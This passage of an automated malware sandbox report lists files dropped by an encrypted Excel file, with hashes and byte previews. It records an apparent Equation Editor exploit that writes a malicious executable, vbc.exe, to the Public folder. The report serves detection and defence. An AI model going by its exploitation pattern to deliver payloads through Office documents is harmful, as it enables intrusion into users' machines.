                                                    Entropy (8bit):7.710378179204039
                                                    Encrypted:false
                                                    SSDEEP:6144:XCKIsPILDjoHJpc/qdtw23+c3sdMeqdnShOKpgXw8KkTdt+lM1U:XxQLDCJpc/o5+c6MvnYk9f5tne
                                                    MD5:FD07F12E2CB2C064A24D25510E2A3496
                                                    SHA1:B8D01E7C8E270C51B3A57768D3B66543F7E37E1D
                                                    SHA-256:DCC4160C26C10D0D9A6E4293494C3A5C794AF751879247809B9E215B80AAEC4F
                                                    SHA-512:BFDF689A254727DDD1A3EE86EDB757D2818DC12026C298224122D11F65FB62F350EBCE3A46BC6A256EE636BC791DF80FC96FEE2886B057E0C2D186A442BC5920
                                                    Malicious:false
                                                    Preview: ......JFIF.....,.,.....C....................................................................C.......................................................................,....!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.O...................u......-C.7.......J..K....K.Y.......Vi..&h.1..@=&......f.-.+x&.V.....4.>'.3j0]h..T.m...\k..4.0.GS..Y,,...X..]%..m........4......U...<f...,t.-n.....3ji...h...7...os......w...s..|M....[.|H...4}2.^.^.[..........Z..L....hWN......,.A..~#..Z..g.]......x.A.V..M.7K..E.....>...K.,z=..v..O..Z.....I.cx....xc.....7WW.W.Euiwi.^.Z.[N.,....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACBFC72F.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):79394
                                                    Entropy (8bit):7.864111100215953
                                                    Encrypted:false
                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                    Malicious:false
                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2D98C7E.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):50311
                                                    Entropy (8bit):7.960958863022709
                                                    Encrypted:false
                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA225833.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                    Category:dropped
                                                    Size (bytes):8815
                                                    Entropy (8bit):7.944898651451431
                                                    Encrypted:false
                                                    SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                    MD5:F06432656347B7042C803FE58F4043E1
                                                    SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                    SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                    SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                    Malicious:false
                                                    Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFDDCC98.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):50311
                                                    Entropy (8bit):7.960958863022709
                                                    Encrypted:false
                                                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C190C815.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                    Category:dropped
                                                    Size (bytes):14198
                                                    Entropy (8bit):7.916688725116637
                                                    Encrypted:false
                                                    SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                    MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                    SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                    SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                    SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                    Malicious:false
                                                    Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3BC9C8C.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 248x140, frames 3
                                                    Category:dropped
                                                    Size (bytes):8540
                                                    Entropy (8bit):7.691804073982831
                                                    Encrypted:false
                                                    SSDEEP:192:a9lSuzORFED8EleeCaJ7nvm4SnvoX2aEiLx:a9lSuzObEPlDCa9vAvoX2k
                                                    MD5:739CD11415B870AD2A2171F6B6495DAA
                                                    SHA1:056A9540A9484C700189982AFD666B80F5B98CAD
                                                    SHA-256:82A148FD582A6F36DC66FAF148DB4C1E19ABC818F7C8BA9E9CEB9A3724A49D43
                                                    SHA-512:4850F5432FC33C214B32AA8BD238F0C2561B3E9DE348308C4593A4F4872ECAD32A7D9AD816664AE21EDB8E09BAF5C4EC2B1DA648CC51B18D3C8E0EC33535F213
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5.|#.c~....RzU.m/..!......yc......?..T.........OJ....?..Q.K......(.`.'..)=*..^..@...G./{j....9c.,.i*.l..._ ...j..R..EP.....o..g1.....K......)..E.....Q.?.?*..K......(.%.......Y..cb.t~U_S..).?.......?..T....@..0neN.....Ad_...........d........b..^..@...E.Y.6'.G.M0DN.?J....?..Q.K......(..".*/...A.....c...zw./?. .......Vq....?.f=^.Y..T_....T_...A.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C84C1666.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):51166
                                                    Entropy (8bit):7.767050944061069
                                                    Encrypted:false
                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                    Malicious:false
                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D16408F0.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D27F0E7A.png
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):6815
                                                    Entropy (8bit):7.871668067811304
                                                    Encrypted:false
                                                    SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                                    MD5:E2267BEF7933F02C009EAEFC464EB83D
                                                    SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                                    SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                                    SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                                    Malicious:false
                                                    Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1F8712.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 248x140, frames 3
                                                    Category:dropped
                                                    Size (bytes):8540
                                                    Entropy (8bit):7.691804073982831
                                                    Encrypted:false
                                                    SSDEEP:192:a9lSuzORFED8EleeCaJ7nvm4SnvoX2aEiLx:a9lSuzObEPlDCa9vAvoX2k
                                                    MD5:739CD11415B870AD2A2171F6B6495DAA
                                                    SHA1:056A9540A9484C700189982AFD666B80F5B98CAD
                                                    SHA-256:82A148FD582A6F36DC66FAF148DB4C1E19ABC818F7C8BA9E9CEB9A3724A49D43
                                                    SHA-512:4850F5432FC33C214B32AA8BD238F0C2561B3E9DE348308C4593A4F4872ECAD32A7D9AD816664AE21EDB8E09BAF5C4EC2B1DA648CC51B18D3C8E0EC33535F213
                                                    Malicious:false
                                                    Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...5.|#.c~....RzU.m/..!......yc......?..T.........OJ....?..Q.K......(.`.'..)=*..^..@...G./{j....9c.,.i*.l..._ ...j..R..EP.....o..g1.....K......)..E.....Q.?.?*..K......(.%.......Y..cb.t~U_S..).?.......?..T....@..0neN.....Ad_...........d........b..^..@...E.Y.6'.G.M0DN.?J....?..Q.K......(..".*/...A.....c...zw./?. .......Vq....?.f=^.Y..T_....T_...A.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3F1BB40.emf
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                    Category:dropped
                                                    Size (bytes):3199944
                                                    Entropy (8bit):1.0723286533222698
                                                    Encrypted:false
                                                    SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                                    MD5:6CFA3170A68147326768DE26F5E88F3C
                                                    SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                                    SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                                    SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                                    Malicious:false
                                                    Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF9034E.jpeg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 935x300, frames 3
                                                    Category:dropped
                                                    Size (bytes):330271
                                                    Entropy (8bit):7.710378179204039
                                                    Encrypted:false
                                                    SSDEEP:6144:XCKIsPILDjoHJpc/qdtw23+c3sdMeqdnShOKpgXw8KkTdt+lM1U:XxQLDCJpc/o5+c6MvnYk9f5tne
                                                    MD5:FD07F12E2CB2C064A24D25510E2A3496
                                                    SHA1:B8D01E7C8E270C51B3A57768D3B66543F7E37E1D
                                                    SHA-256:DCC4160C26C10D0D9A6E4293494C3A5C794AF751879247809B9E215B80AAEC4F
                                                    SHA-512:BFDF689A254727DDD1A3EE86EDB757D2818DC12026C298224122D11F65FB62F350EBCE3A46BC6A256EE636BC791DF80FC96FEE2886B057E0C2D186A442BC5920
                                                    Malicious:false
                                                    Preview: ......JFIF.....,.,.....C....................................................................C.......................................................................,....!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.O...................u......-C.7.......J..K....K.Y.......Vi..&h.1..@=&......f.-.+x&.V.....4.>'.3j0]h..T.m...\k..4.0.GS..Y,,...X..]%..m........4......U...<f...,t.-n.....3ji...h...7...os......w...s..|M....[.|H...4}2.^.^.[..........Z..L....hWN......,.A..~#..Z..g.]......x.A.V..M.7K..E.....>...K.,z=..v..O..Z.....I.cx....xc.....7WW.W.Euiwi.^.Z.[N.,....
                                                    C:\Users\user\Desktop\~$MKDRPSJS9E999494993.xlsx
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):330
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                    Malicious:true
                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                    C:\Users\Public\vbc.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):73728
                                                    Entropy (8bit):3.8027076963041346
                                                    Encrypted:false
                                                    SSDEEP:768:EltriQ4cyKU+NSpGGLgqHXRmf9l/h97Q:7vh+NSUGLtg9Bo
                                                    MD5:6CC6D1DD6CDD848693426A270563C921
                                                    SHA1:B7D970A91FD89E99C3533C22B14EA7B00258E011
                                                    SHA-256:7D0B3FE8AA36FCFFB72E5A7F03E60D8F1E0A5FC211D223B84D15706C3444D817
                                                    SHA-512:218FAD1CAF9FD03F3EBE1B6E2A5E2F3916EC37C2EDA0A99FFB816B359A7975E95B2F7DF8902BFC25F97D6ED9D532D05CE5CFACCB02E18760A2731C459F913809
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...x..P..................... ....................@.......................... ..............................................D...(...........................................................................(... ....................................text............................... ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:CDFV2 Encrypted
                                                    Entropy (8bit):7.996786972909979
                                                    TrID:
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                    File name:MKDRPSJS9E999494993.xlsx
                                                    File size:2663936
                                                    MD5:1a40446f940b183d3d94f0e31fc8560d
                                                    SHA1:5db0c0c8d1e079b5a2d5bc2858a55ff4498c3fb3
                                                    SHA256:adfefd8b289eecc823dc6d2b2f9acf6e5a4e49db2917af74d34354ac867c3235
                                                    SHA512:0cc4353d09d838d3b1ce9a23bd969df8c67ce03e6494534e5d3a431e70310d641a7bb8e56c7f83d378e649f0bcb199292763f00414c3e888f8f52c1aa339fec4
                                                    SSDEEP:49152:Pv/SYmfJU/Dto5qpVC8RRF0nqGtK2NlTD3eOBkDTKA8qnnn02vRv9EsBnfHxJP3s:fSYmfJC5oiT0nnBlHeOE8qnn02vj5pfQ
                                                    File Content Preview:........................>...................)....................................................................................................................................... ...!..."...#...$...%...&...'...(...z.......|.......~......................

                                                    File Icon

                                                    Icon Hash:e4e2aa8aa4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "MKDRPSJS9E999494993.xlsx"

                                                    Indicators

                                                    Has Summary Info:False
                                                    Application Name:unknown
                                                    Encrypted Document:True
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:False
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:False

